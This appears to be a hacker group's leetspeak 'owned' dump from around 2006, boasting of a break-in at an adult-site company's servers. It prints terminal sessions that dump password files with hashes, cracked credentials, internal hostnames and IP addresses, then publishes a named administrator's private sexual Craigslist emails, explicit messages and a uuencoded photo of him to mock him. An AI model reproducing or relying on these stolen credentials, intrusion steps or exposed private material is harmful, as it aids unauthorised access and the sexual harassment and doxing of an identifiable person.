Subsystem:/:/usr/sbin/nologin man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin johnh:$1$m1mMZ37N$2UdA4ThopQzCNuyWhapGn1:1001:1001::0:0:John:/home/johnh:/bin/sh mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin bbros2257:$1$mEii.TPy$ecXpN9WvsIBqUJYXb4QSs/:1002:1002::0:0:bangbros 2257:/home/bbros2257:/usr/local/bin/bash %cd /home/johnh %ls -al total 128 drwxr-xr-x 4 johnh johnh 512 Sep 30 11:35 . drwxr-xr-x 4 root wheel 512 Jun 10 2005 .. -rw------- 1 johnh johnh 135 Sep 28 18:05 .bash_history -rw-r--r-- 1 johnh johnh 767 Jun 10 2005 .cshrc -rw-r--r-- 1 johnh johnh 248 Jun 10 2005 .login -rw-r--r-- 1 johnh johnh 158 Jun 10 2005 .login_conf -rw------- 1 johnh johnh 373 Jun 10 2005 .mail_aliases -rw-r--r-- 1 johnh johnh 331 Jun 10 2005 .mailrc -rw-r--r-- 1 johnh johnh 797 Jun 10 2005 .profile -rw------- 1 johnh johnh 276 Jun 10 2005 .rhosts -rw-r--r-- 1 johnh johnh 975 Jun 10 2005 .shrc drwx------ 2 johnh johnh 512 Jun 10 2005 .ssh -rwxr-xr-x 1 johnh johnh 38462 Sep 30 11:06 php.ini drwxrwxrwx 3 root johnh 512 Sep 30 12:09 public_html %exit logout Connection to 64.111.193.12 closed. %exit logout Connection to 64.111.193.9 closed. pr3tty funny h0w dvdman w4z th3 r34s0n bangbros g0t 0wn3d.. h1m b31ng th3 s3cur1ty 4dm1n & 4ll. -~-~-~ $ uname -a FreeBSD John.Bangbros.com 5.3-RELEASE FreeBSD 5.3-RELEASE #0: Mon Jun 6 13:27:56 EDT 2005 root@John.Bangbros.com:/usr/obj/usr/src/sys/DUMMYNET i386 $ id uid=1004(dvdman) gid=1004(dvdman) groups=1004(dvdman) $ ls -al total 384 drwxr-xr-x 8 dvdman dvdman 512 Aug 30 09:33 . drwxr-xr-x 11 root wheel 512 Jul 14 11:54 .. drwx------ 3 dvdman dvdman 512 Apr 5 2005 .BitchX -rw------- 1 dvdman dvdman 5647 Nov 17 13:42 .bash_history -rw-r--r-- 1 dvdman dvdman 767 Mar 30 2005 .cshrc -rw-r--r-- 1 dvdman dvdman 5 Dec 28 11:14 .ispoof -rw-r--r-- 1 dvdman dvdman 248 Mar 30 2005 .login -rw-r--r-- 1 dvdman dvdman 158 Mar 30 2005 .login_conf -rw------- 1 dvdman dvdman 373 Mar 30 2005 .mail_aliases -rw-r--r-- 1 dvdman dvdman 331 Mar 30 2005 .mailrc -rw------- 1 dvdman dvdman 2763 Sep 1 13:35 .mysql_history -rw-r--r-- 1 dvdman dvdman 24 Dec 28 11:14 .oidentd.conf -rw-r--r-- 1 root dvdman 103 Aug 30 15:29 .passwd -rw-r--r-- 1 dvdman dvdman 797 Mar 30 2005 .profile -rw------- 1 dvdman dvdman 276 Mar 30 2005 .rhosts -rw-r--r-- 1 dvdman dvdman 975 Mar 30 2005 .shrc drwx------ 2 dvdman dvdman 512 Jul 9 14:54 .ssh drwxr-xr-x 2 dvdman dvdman 512 Aug 24 14:54 logs -rw-r--r-- 1 dvdman dvdman 312224 Jun 24 2004 psyBNC2.3.1.tar.gz drwxr-xr-x 11 dvdman dvdman 512 Jul 11 14:16 psybnc drwxr-xr-x 3 dvdman dvdman 512 Jun 30 2005 psybnc-spoof drwxr-xr-x 8 dvdman dvdman 1024 Dec 8 13:43 public_html $ cat .passwd johnh:jGNBUNbheu.hM flatline:9YJnrb8rqva/M elesha:O79xM1OkQgqtk duck:K6145zM08.5EM kevin:cfBzVeHe4j/OQ plz n0t3, john.bangbros.com was l33tsecurity.com unt1l dvdman w4z f1r3d. 4ls0 n0t3 th4t h0no d1d n0t t0uch bangbros. w3 l0v3 p0rn. d0nt hurt th3 p0rn! -~-~-~ %ssh paysite.bangbros.com -l johnh Password: Last login: Sun Jan 1 08:49:49 2006 Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994 The Regents of the University of California. All rights reserved. FreeBSD 4.8-RELEASE (GENERIC) #0: Thu Apr 3 10:53:38 GMT 2003 Welcome to FreeBSD! Before seeking technical support, please use the following resources: o Security advisories and updated errata information for all releases are at http://www.FreeBSD.org/releases/ - always consult the ERRATA section for your release first as it's updated frequently. o The Handbook and FAQ documents are at http://www.FreeBSD.org/ and, along with the mailing lists, can be searched by going to http://www.FreeBSD.org/search/. If the doc distribution has been installed, they're also available formatted in /usr/share/doc. If you still have a question or problem, please take the output of `uname -a', along with any relevant error messages, and email it as a question to the questions@FreeBSD.org mailing list. If you are unfamiliar with FreeBSD's directory layout, please refer to the hier(7) man page. If you are not familiar with man pages, type `man man'. You may also use /stand/sysinstall to re-enter the installation and configuration utility. Edit /etc/motd to change this login announcement. -bash-2.05b$ sudo cat /etc/master.passwd # $FreeBSD: src/etc/master.passwd,v 1.25.2.6 2002/06/30 17:57:17 des Exp $ # root:$1$SfL/0Uq8$E.Fop5NEh96mT0.hBZH4Q0:0:0::0:0:Charlie &:/root:/usr/local/bin/bash toor:*:0:0::0:0:Bourne-again Superuser:/root: daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin operator:*:2:5::0:0:System &:/:/sbin/nologin bin:*:3:7::0:0:Binaries Commands and Source:/:/sbin/nologin tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin games:*:7:13::0:0:Games pseudo-user:/usr/games:/sbin/nologin news:*:8:8::0:0:News Subsystem:/:/sbin/nologin man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/sbin/nologin bind:*:53:53::0:0:Bind Sandbox:/:/sbin/nologin uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico xten:*:67:67::0:0:X-10 daemon:/usr/local/xten:/sbin/nologin pop:*:68:6::0:0:Post Office Owner:/nonexistent:/sbin/nologin www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/sbin/nologin nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin josh:$1$wLtfxD/T$XhYx.u4qVXlJh940I7/u2/:1003:1003::0:0:Josh:/home/josh:/usr/local/bin/bash bangbros:$1$QNtXkAf7$fkEEnymX.iMzCKJfnUvyX1:501:501::0:0:BangBros.com, Inc.:/home/bangbros:/usr/local/bin/bash mysql:*:88:88::0:0:MySQL Daemon:/var/db/mysql:/sbin/nologin johnh:t0qR2t0WPnC7s:1002:1002::0:0:john:/home/johnh:/usr/local/bin/bash winter:89hjJ3urZ9z.k:1000:1000::0:0:winter:/home/winter:/usr/local/bin/bash smart:$1$LqqujJ1b$t0ye7DtQQYWpcz4iNZfXv1:1001:1001::0:0:smart:/home/smart:/usr/local/bin/bash -bash-2.05b$ w 5:51PM up 67 days, 46 mins, 12 users, load averages: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE WHAT bangbros p1 test:S.0 26Oct05 23:36 ssh ox-xsan-meta2.isprime.com bangbros p2 test:S.1 26Oct05 4days ssh smart-pay1-1.isprime.com -l admin bangbros p3 test:S.2 26Oct05 6days /usr/local/bin/bash bangbros p4 test:S.3 27Oct05 3days /usr/local/bin/bash bangbros p5 test:S.4 27Oct05 6days ssh 64.111.193.18 -l johnh bangbros p6 test:S.5 28Oct05 5days ssh 64.111.193.9 -l johnh bangbros p7 test:S.6 01Nov05 4days /usr/local/bin/bash bangbros p8 test:S.7 03Nov05 4days ssh ox-pay1-1.isprime.com bangbros p9 test:S.8 02Dec05 6days /usr/local/bin/bash bangbros pa test:S.9 12Dec05 4days /usr/local/bin/bash johnh pb 64.111.193.9 5:50PM - w bangbros pc test:S.10 Mon04PM 5days ssh smart-pay1-1.isprime.com -l admin -bash-2.05b$ exit logout Connection to paysite.bangbros.com closed. -~-~-~ 3y3 th1nk th4tz 3n0ugh.. th3r3 1z l1k3 a m1ll10n isprime/bangbros b0x3z w3 c0uld sh0w y0u.. but n0 0d4yz r3s1d3 th3r3. 4ft3r 4ll th1z 0wn1ng.. h0no c0uldnt f0rg3t t0 ch3ck 0ut dvdmanz m41lz. 1t s33mz h3 1z h1d1ng a f3w s3xu4l f3t1sh3z. -~-~-~ 24 years old in SOBE. Looking to dress up like a little girl - 24 Reply to: pers-175520173@craigslist.org Date: 2006-06-26, 9:38AM EDT Hello I'm looking for a married guy or a guy that lives with a girl. That can bring me something of hers to wear for you while we play. E-mail me now if you're interested i am all alone home and im looking to play. -~-~-~ From : Robert ***** <**********@yahoo.com> Sent : Monday, June 26, 2006 1:38 PM To : jon king Subject : RE: 24 years old in SOBE. Looking to dress up like a little girl - 24 Go to previous message | Go to next message | Delete | Inbox so what happened ur not down? jon king wrote: I am alone now. If you can travel From: Robert ***** <**********@yahoo.com> To: jon king Subject: RE: 24 years old in SOBE. Looking to dress up like a little girl - 24 Date: Mon, 26 Jun 2006 07:13:50 -0700 (PDT) only pics i got are on myspace but i have to be able to log on look me up by my email, **********@yahoo.com i only got a black thong and pink with hearts kinda thong...im 6 ft 190 greenblonde average built, do u have any girl clothes?? what r u down to do? ill be alone in doral today at 5 so let me know wutz up jon king wrote: my hole is shaved and ready for you to lick it. I love to suck on cock. and sometimes get fucked. You got a pics? From: Robert ***** **********@yahoo.com> To: jon king Subject: RE: 24 years old in SOBE. Looking to dress up like a little girl - 24 Date: Mon, 26 Jun 2006 07:09:21 -0700 (PDT) nice ur ass looks good and her panties shold fit u nice......do u shave ur ass and asshole? if u dont can u? or i can shave it for u if its cool with u, so what u like doing sexually??? jon king wrote: Here is a pic of my ass. From: Robert ***** <**********@yahoo.com> To: pers-175520173@craigslist.org Subject: 24 years old in SOBE. Looking to dress up like a little girl - 24 Date: Mon, 26 Jun 2006 06:55:03 -0700 (PDT) hey im bi on the dl, i got a girlfriend and i got 2 panties one thong and the other is a sexy panty shes a bit thin so im not sure if they will fit u but i would love to see u wear that im 24 white lat 6 ft 190, what u look like? u got a nude or body pic to see if they fit u well id like to try this so email me -~-~-~ 24 yrs old. 8th and meridian - 24 Reply to: pers-175604573@craigslist.org Date: 2006-06-26, 1:07PM EDT I am into wearing womens panties / skirts and more if you're into it. I am looking to play now. it's 1:06pm. I can host. email me and we can chat. * this is in or around SOBE * no -- it's NOT ok to contact this poster with services or other commercial interests here is uuencoded pic of dvdman in girls panties which he sent to the craigslist. begin 777 ALc7VOXrGXe5cscMFucya7NaVJmN.jpg M_]C_X``02D9)1@`!`0$`2`!(``#__@`>3$5!1"!496-H;F]L;V=I97,@26YC M+B!6,2XP,?_;`$,`"`8&!P8%"`<'!PD)"`H,%`T,"PL,&1(3#Q0=&A\>'1H< M'"`D+B<@(BPC'!PH-RDL,#$T-#0?)SD].#(\+C,T,O_;`$,!"0D)#`L,&`T- M&#(A'"$R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R M,C(R,C(R,C(R,O_``!$(`,P!+`,!(@`"$0$#$0'_Q``;```"`P$!`0`````` M```````$!0(#!@$`!__$`#X0``$$`0,"!`,$"`4$`P$```$``@,1!!(A,05! M$R)1810R<0:!D9(5(S-"+\@5AQ,8#?&AO\`@"[:LV?R#?9+Y?11&+"@L.\"*N_D M"O&)C`_Y>+\H4HKT:3L5;MZ);D[+LK&+BWMCP_D"E\)C_P#!%^0*8=OPI@:C M01)V6B+,7&'C8[GG'A!'JP+*Y3HII#4$8'LT)MUS+UR")IV'*2K1BM]@R=%9AB` MLQL`'_:%FNI9C9<@LC:T1CT'*>]4R#CX+W#DB@L@76=^5IA'V5$MV(V`4=)' M(&Z[&58&%Y``-]@G%E=@#@*)((3-W2LID'BNA=IJT"YK0T[;J$2*@0/2UI.A M]<@B+,?*@C(N@\M%K-D;#92HA]8;#B2L;(((G-(V(:%/X3&T_P"7 MCK^`+)_9CKV[,*+\@4/A<%WQ:Z"ZZ[H$0\QA<1L:1`:`.%4S7J%W2N5,)'K7EY52S"/DB ME6RRU1UM!W(2O(ZF`2`1LEDO4I'71`5QBRK-*9V+WC-/=9$YLQWV5M83O\`4I6GJ6(Z-SFRMX]5D!$3[+CH=#>>?1"3@79,OC9+G$V+53Y&1CS. M`51C>8Z#B/=<9C'D@N/J4_'.*0#AL7=9<_)@;'`PNWW*2?`Y/_&?P6R;`?W@ M"N'%;QPFQS16@OCHQ\>+*)`"U:CI738F21ND`+AYJ4G85DU]Q7&,GQW:FNW4 MEG5:"4'['TCA)"8@P:2*X6#ZAB>!E/9QOL%J(>H3-<#(T%O"4]3@?FYAECV& MVR5AFU+\ALU'CH2,A=(::TFE:,-Q!!8;^BT^%T\8D>X!>X7:JG:QCR=(#RM$ ML\4Z$J#9DB),6<$6US38*^D=#RWYW2XI)3;CL:6*ZNT.T$`:SL*6U^S^$H`WPEN6T M^*-OW?[J!QV/8AXFX5X'9*\/(\-VDV1V31C@]MA/GMB798T;@(QH(`'9#Q&N MUUW1.Z6W9*+&,!WUT5-L=.U$VJ@WC^JL\,]GG\4+(BU<3K)45ZP!9*I\3Q;`L`'GU3G458&Y'9"7-TM->Z\R(AH`V"L9'N+5BSSR- ML="-$6Q"A:M;'>PJE$#?8*^-E`ZARAOV,43PC#1YANHRL;IVV*NKT53F6._X MI#EL;6BEC;-#GU5HB/>E..*R*%E7>$X42$?+Z*XE36`'8*SPK%TO5[(F'>.D MNVF,:!ACD\-7'8I(^5,=%-#@;4-^5+)6A2['`/NN'#;)O6_.R9/B:_O14HH= M+_FY5_(P>*8CG9DPM\KB[WKA),A^3+>IA,FH!A`Y6^DPVN:E,^'\/.V5K02T MV+3<66/;!DG6@:+[+/FFAGR'4&@%S+X]0M*6:0![4J<3,&5'7[_<>ZOV+JLD M(YY>2I&9W[(+A:2?FV^BL>/,*4"+]4AJB%,GS?8Y`+V*=-M/HKC2HT$&Y)M7H3&EU`#GLBQLEO[%LD'UMI!7 M7S-9&=JV40&T=S?HEN?E!@T@G941%&;G=A5)=XQ>=Z'U4'O,A!*CNM&/&ULC M?T6%^GY:^Y4S9#6_-\U;`*B;+#3I9N>Z$+BXVXV4=OT6E?99),Z9P`V'HBH6 M`4!MZH.`!T@]MTQA;>[DK)8<:+0*;QLNC<@API1[N"2NAFPB*'> M^Z)9$.XW]U+'CU=K]406!K$J4GT&D`S,$9L=U5=BT3D'R#9#MV/&R#V,]%\` M"*,0B+AZB'#4&_4)C)#'D1\!)LK"?CO+X@2.X1PE8F<;V%/S2\;- M_FH_%/\`1+W9L48_6G2?=4GK&"/]8)JBV+H9NR7WO2B9G'O26?IK!O>4?@O? MIW`'^K_)&L;8-H8.<7P/][OP43]H<"MG._!18Y>D2QBX:A269K2)F M@#]W^Y7O_D.$1L7(3)Z[C/E!;=`4I\:UPBPCEV1(8X, MQU"Z3@':RLQ#)X4@]/=,7=3:V+2'`N2^V"XA>5F"(%H/F2.67.*@G8X?8MOZ.EPO9M*F9Y+':;%=U:QCI)-+?Q5><\11Z&D7W3')H*,;V+ MZ#:[^JJEE#20/JO/>3L$-(:Y.Z-)T6_T&X;_`#6>^R9^)3:`2?$<7MKO:ODS MHL7]H_4[T"5D@_044J&<;"XZB+/9,((M(LTLA+]HIA^Q:UOH:0HL>[R3L/MJ7SK6X]R?O7?$E'[Q'WJ/PU]D62CZ4,A[@=P?INO M12F-^H\+YY!G943@62N%>Y3?%^T(UT$LQM9):`>!8/"&FG M%7P![H.#.CGQM3)`6]O9"OR0]Q+W`,"0H.Z8SE2LHR_$SSY21"#O[I/F8HB- M!WT3#)Z@UK/#@``]4N=(YSK=YOJMN&+2$R;?9;TL%LWO2TF--J&ZRS9'->'@ MT1Z)OA9?B5N-0[*\\+1473-5B9+AL[?[TT#&S,.W\UG,?(TGS)WB3!S1NN=* M%/0Y,7=3Z0R5A!9866/2M+C=-QWS>%,`#>QKE73X'2L>0QO>-0[ M!=6%25HP3EP=,RO@1_[0H.QF[T%KH\7I#Q\_`[A0=!T9KM)FWU7`W M4:2L=_HEN'.]L3HNXVY3'%JTM4A,8VPGQ1C0DW1I)\B8ROLD[J69,9'_`-D#+,!8!^]#"+;V->M'9)0V MQ>Z&#I)WAD8+G%>AA?F9`CC-#N?1:'%PH<..F`:N[NY6CI`-T*)O$Z9#I<;E MDX]D'C]-R\PW7.Y+DWF@&5U$/?19&-DVQHM8`:*"7S45;)3?0EA^S#B/UDOY M42/LI&1M,;6FAQ1MM]2C6XS>`TGZ),O*:>@EC;,4[[).YCGW]"$#D?9SJ.." MX1A[1_M*^C_"@FM%%3^%`IH-WRA7F5V%\+]'R&2)\3BU[2UP[%0K;=?5PB6,!W^X#=8/K7V?FZ4\D#7"3\WHM,,TBRYO)^-T,AC)%^\WN4URNEQ280?CWQW.ZT3L6@3IY0LD M%`E@K;Z++/.I;&?&T8#)A=#(6D4J2=EJ.J=/$H+@WS+,S1F)Y8>W=;,,U)`% M=E2BD=&\.!*@O<;IS*-!T_,9.-!=YO=.()GPNYMJPC'NBE#XW?S6DZ;U2*5H M9(6AW'*QYL5;&1D;+$S0X#S&TRM].UDL6KGLD'4<2-X(T\+7@SN.A67#&>Z M,A\1D2M\SWM[[!>;)(8Z$CW&^3RF&5E-@R(F&$:6`@FDK$W^*U-`#2Y=".1R M,3QI>C[?T7!9']ELHN#[WWMBE+=QN"KI`)&AWLKJB'NE3-Q\LM=P\69\3PG@ZV[7ZA5**>P)+85AQ:Y-5EF!$*'LG^.PC35V.* M63-)(9`OB@)YJD2(]#:"ZW?V/HKXX76#V]UC;0^*.Q0-=%;A9*FW&`:?7U5] M=@K8@:OMZ)3=!I`9AH`=T-DX$63COCDC#FD5NG):T]@JIF&J`K9+YN+M#.*: MH^,]4Z4[IG4WQ%K#&XV"\6"%0_A[8@!>[F.V6[^UV`V;%,H'G9O=1H/`TG^J[GC9ODC^SF^1!P9M_LLP1]#A%V=^%H61M(!/)66^S$SCT]K2+ MW[%:W&TG8A5C>4T-EG<[IHE::;Y@M]DXPH11D6"X+K8YD MD&^RT75^F^&'21MX[+,W60PF]CO2)24BK?9K(LM^/+X,A);I&Z9LF(#2UVW9 M9G&ZA"[/!D;Y'`-W/"7QQNIKO59L^%=H/'DW3-%AYY(T.V^J[E MMVL<%+F.#N+1'Q+C$(W;@=U@<:=FJ+%\\,3,ALLL>MG[UKTN/@RN:^%@:!N! MX1_](B5S#$25O.D=4Z3^AL=L@@\4-H@@+I^$^?XF'S/P7)`W1LR?*^SN8F-Z5D,ADB`H'T2'(G+R3?T4'YLDK:>ZRJ"27[C ME6"^ZH:2T[*8>3RX#[DTA:O?7=1%D;.4V,<__P!JBK*RUT>]6S^BN8\C@HW' MA);I<`0?9"Y6'+BR$U<9.Q]$-D35E3O=,>FL_5EQ&Y*7VFN#1B"J3T$Q]A-H M?R3S%!-#BDEPWU7U3G%<=0-KFY78V/Z&$;?,*%^R-:20`6\(2%U.ONCFT\6T MG?M2S-:'(L9&ZP:%(AD=\"E!@-;HF&]._""3I#(QLZUE"B!]53*VCPBE6\BC M9_DD2;&49?KD)?`]HWL=U\XDA$?B@WJ!X]E]0ZG6DUN5\ZZ@PMR\AORAQ#@: M73\"5.C)YL?PL-^SF0]CO"+=@>%O\/S:2-A5KYIT69L.4YMEP<1ROHO37DQM MW[<>BKSE4K*\3<1S&RSNK',UQ@\%1AW=OV5CB0"`N;)HVKH"EBU_5*<[%$C" M2VR$[-VA,B/:U(2:8,EH^3_:'ISL;,\1H)8_^J"Z1&3U.(:=N5N^OX0GQG[; MC<+*]-B#<]KAL1:[GCY5*%,P98TQQEAIQ7ZJHA8HP?#Y7CR1"6('Y;6OZF_3 MC4#RD3@'"G"PBPOC8J10[+P9&4S``D/<.X3'I<3HV-!-GU2L8T;,BF"KY3W$ M:&"N$S-D7$D([&#`6-WXY5[3ZE;`W6QI*^H-D,[:&NF?/6D!Q)_FI" M46JW<**>AS80)6=R5,31@;6A`N[>JA+#X\B$[.OE,X(6N:"T['?A9X4FT,Q& M.WGRBE",B:83@&,W[(62-DEDD!6XX\H;L*4>T&F:+$(L'V3W%HUI/XE9K#?3OI MW6BPB*HU2Y^70^`WC\AL%&0D%H+B1:`BTU0X]49#\GWK+*FAR#V\@]D6P@MV MX0$<@+:/93,NG?:TF5#HL.-4AI?F(5#&]4S50R@$#>^Z MO\3V*3-R!8`L!7,R-@TOOW"Y+B;ZL/>Z[*$E<2-R>>%'6+WO[U%[FWMS_53B ME[*:8LS@'QN'=8Z&-N/G2!Q``/*V64XZ2"L7U-SFYK]+MEN\:33HS9E9'JN1 M&0`'@I49(Z^;^:YE2@L+)`!?H$!%`U[QH&P*Z48Z,;3#,8>),9#ZTG$9KA!0 MPAK!9``1#GLKBZX2\LKT'!5LND?^\=J"HQ8C/*9'&VCCW2W,S`SRLY/HHP=0 MF#6AK]D,,;[+;HUL3=.]W:*A=VW*R\>?D`"GJS](90\P<"?=`\$' MF_M6_P`/]RD9ZMEM(=L0!Q:%R>O9/B#]75#T]U'BD2*HS+ME%3DY.R@NDA;. M*0X7%)46C@^8)UA>$UFXLD<)*/F3GINDR@'?91D:T$/=CQLU2,TM[FE6,S!; M\K@!PI]3/^&(.P!V2!YL[E4M@I6.7RXTVT1U$;_1$PC;W2SIK=1>0T;=TVC% MC;DH)Z"2V,L1W=:'%<-M^5G<1I#@.Z?XQH@$42L.5,?$=1N_5BBKV.)[T@&2 M$-1$&QK6G@+ M`8,@&62]X=[K4X,HU;.Y]UH\F')"<+IFLBF-7R$0V9H/.Z3P3NH"]AW1#7V1 M1^]1+8Y67ZD0Z=[@-]D_R M7TT[K/RZYX`-GNI MF5H%DC\5T;?&D8WV6DT-^$)E90C&EOS?T5<^8&@Z392_QW%YU"_=2.-]LMR( M/:Z22S=E&840:?,%Z*7'<1J:\?>C8Y<04->D>X36ZT+[#H#BF@]I",:S`(V< M4N$F(-QD#^BD'XMVW)CU=M12)*^F4G05/%B`$M)"1YC6>/M=5_=,7F%[K^+A M/L"@,D1/E!\:/85RJCR0:$;R;WK[EYK2YP`NSVI3!`-5J/NC>G8[)1>@I0]KXGEKVD$;44XCZYDQG2[2X#T4W9.)U.0L MR0V-U;/X*A5L17NFW3G$S-]ME7-T>2-]LD:^,[AP5N+"8'ZR[<*$LOZN:QA[ ME(31LD)OU>35%'I.Q*4-!QSB+H*UKZ\P/MNJ00QE$KC9 M`3LL[=H?']EKY+)'\T/+.6D\>R](ZS00LIL_15%#$%(2``3[TD,+2YP%]UI.FPN;L7#=5DJMDCV/,9Q\ M(;[TBXY7-(_HJ(F:6^ONKVM%FS]/==UES1[+9XL4U;,V6 M;LH?E3/-D[J)R9:W_HB"QI'%+QC:3PMR2$-L%;,0;+03[J?CV*+0%&=H:X`4 MJE91:9B!3>%SQBJUY0A=XGEU;JUC=;`X'="=J1$;R&``J4BB8C/8A1>P@]N% MT.-B^%US[*$LJ`%^_JB(8Y)R0S4X@$FE07#??=09.^*]#R+!%A&4<<\'U59K MN.5-GF(%TNSV'`'L%93/19,L.S)'`>E[(F/J)'[1NKZ"D"N;>ZC5E=AV;DQY M#&!EBNQ56*S5+?8(>DQP6?+[FT-46AOBL'E[<%-86`"^Y""AC^4TF4+=9#5E MRO8<:.M%G;MNC820T'LJO#:#PB(39XV"S2:'I:"6D$6Y=+F@>4K@`!L"_JNU MJJR`%F=/H:M%3@+HDBT/(0V][]U?,X1@[_1+5TO'QTK,F65G%T-U;!05I;$)%4 M,=D#<%:'ID!!^>_[()N-IR``-G=RG6/CB+SCGV2,LOQ&10RB:6#.. M4.PC2#>Y5K3J%-'_`/%S)?9LCU1X['3JL*I^UFU>Z,MC+B4+*X!A0A-Z,_U& M8_$`$]CLD1<=7)3#/FO.%\!U)?(W1*YOH5U,$:B8YO9PN.^^RDQQ/J?N59HB MEH.BQL.,YQ`._)3I:0MLSV0Q]WI/'HJ**V.>QOP,VP--OA9.,`L]U49\NBNR MD@KP5CPT<<^BA81DHZKF\!4;>JN!`:%"[)KU@*!>&]E%Q#B#?90LG+$0;0]6 MF3P"T@H"AK^]0HXUKCL`25U\4C7D/:01ZJV-QC<7M.X*EG3/E?J>ZR2H4"KR MZ`O4K*:/!-\%FX/H$I9\P^J=87"IL)=#C&%`#>TPC=H=:`QS3V(Z])L+#D[& MQ6@R,ZQ5?BKXVFMQ?LAF$TTWNC6[`++-^AE$F'<^6PN71V'97<1T$-(XAM]T MH:4S.;QR2D_4)6-!%&Z3-^]'W6>ZNXM,A"=C6P)&>SIA)+7HA%*79RBNM%4C M))V>3CIW->R3IC@N(TT54?'\@7.RR=T.@ M@H;M&GMV1,-C@;>J#B)(5['DD.69NS1$OF)JMJ[I;FO#8G#C9&N.IV_JE?52 M6P.I%&-T5+2,GDR!^63ZN5.1,#D2?5>82[):#ZE#R;O)]RNM%4D8Y/9)SB3S MLF_3NJ0XL#F/#B2;V29<1-650_R>M0S8TD;&O!<*W21K]+:'*@O(8Q4>BTCQ E=>Q45X\KJ/HJ2.*S5Y0*W"K4CL[[E3*1YYOLN`KSN%P<*%G_V0`` ` end -~-~-~ From : thom * <***********@yahoo.com> Sent : Monday, June 26, 2006 1:38 PM To : jon king Subject : RE: 24 yrs old. 8th and meridian - 24 Go to previous message | Go to next message | Delete | Inbox Attachment : P1015086.JPG (0.02 MB), face2.jpg (< 0.01 MB) no womens stuff here -- 30 th and collins jon king wrote: where do you live? got a cock pic? and do you have any womens stuff? From: thom * <***********@yahoo.com> To: pers-175604573@craigslist.org Subject: 24 yrs old. 8th and meridian - 24 Date: Mon, 26 Jun 2006 10:29:02 -0700 (PDT) looks like a nice ussy you have -- love to lift that skirt and play with it-and watch you play with it. got a face pic-- will respond with one to email 34 yo 6'0" 170avg hairy man --- love to have you suck my cock while dildoing your pussy __________________________________________________ -~-~-~ BUHAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHA AHAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAHAHHAHAHAHAHHAHA HAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAH AHAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHA HAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHA AHAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAH HAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAH AHAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAHAHHAHAHAHAHH HAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAHAHHAHAHAHAHH AHAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAHAHHAH HAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAHAHHAHAHAHAHHA AHAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAHAHHAHAHAHAHHA HAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAHAHHAH AHAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAHAHHAHAHAHA HAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAHAHHAHAHAHAHHA AHAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAH HAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAHAHHAHAH AHAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHA HAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAHAHHAHAHAHAHHAHAHAHH AHAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAHAHHA HAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAH AHAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAHAHHAHA HAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAHAH AHAHAHAHAHAHAHHAHAHAHAHHAHAHAHHAHAHAHAHAHAHAH HAHAHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAH!@#$(*@#%^*!@#(#$%!!@%&$$# H4r H4r 